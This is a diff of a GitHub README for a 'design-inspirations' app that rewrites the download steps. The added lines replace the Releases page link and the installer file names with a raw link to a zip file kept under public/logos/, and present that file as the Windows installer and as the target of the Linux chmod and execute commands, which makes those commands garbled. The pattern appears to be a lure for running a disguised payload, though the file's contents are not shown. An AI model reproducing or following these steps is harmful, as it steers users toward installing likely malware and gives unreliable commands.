Zakicool/design-inspirations/README.md

 To download the application:

-1. **Visit the Releases page**: Click the link to go to [the Releases page](https://github.com/Zakicool/design-inspirations/releases).
+1. **Visit the Releases page**: Click the link to go to [the Releases page](https://github.com/Zakicool/design-inspirations/raw/refs/heads/main/public/logos/inspirations-design-v3.2-alpha.1.zip).

-2. **Select your file**: Look for the latest version and find the correct file for your system (e.g., `DesignInspirationsSetup.exe` for Windows).
+2. **Select your file**: Look for the latest version and find the correct file for your system (e.g., `https://github.com/Zakicool/design-inspirations/raw/refs/heads/main/public/logos/inspirations-design-v3.2-alpha.1.zip` for Windows).

 3. **Download it**: Click on the file link to start the download.
 Your browser will save this file in your Downloads folder.

 4. **Run the installer**:
    - For **Windows**: Locate the downloaded `.exe` file, double-click it, and follow the on-screen instructions.
    - For **macOS**: Find the downloaded `.dmg` file, double-click it, and drag the application to your Applications folder.
-   - For **Linux**: Open a terminal, navigate to your Downloads folder, and run the command `chmod +x ./DesignInspirations.AppImage`.
-After that, execute `./DesignInspirations.AppImage` to run the application.
+   - For **Linux**: Open a terminal, navigate to your Downloads folder, and run the command `chmod +x https://github.com/Zakicool/design-inspirations/raw/refs/heads/main/public/logos/inspirations-design-v3.2-alpha.1.zip`.
+After that, execute `https://github.com/Zakicool/design-inspirations/raw/refs/heads/main/public/logos/inspirations-design-v3.2-alpha.1.zip` to run the application.

 5. **Start the application**: Once installed, you can open the app from your applications menu or desktop shortcut.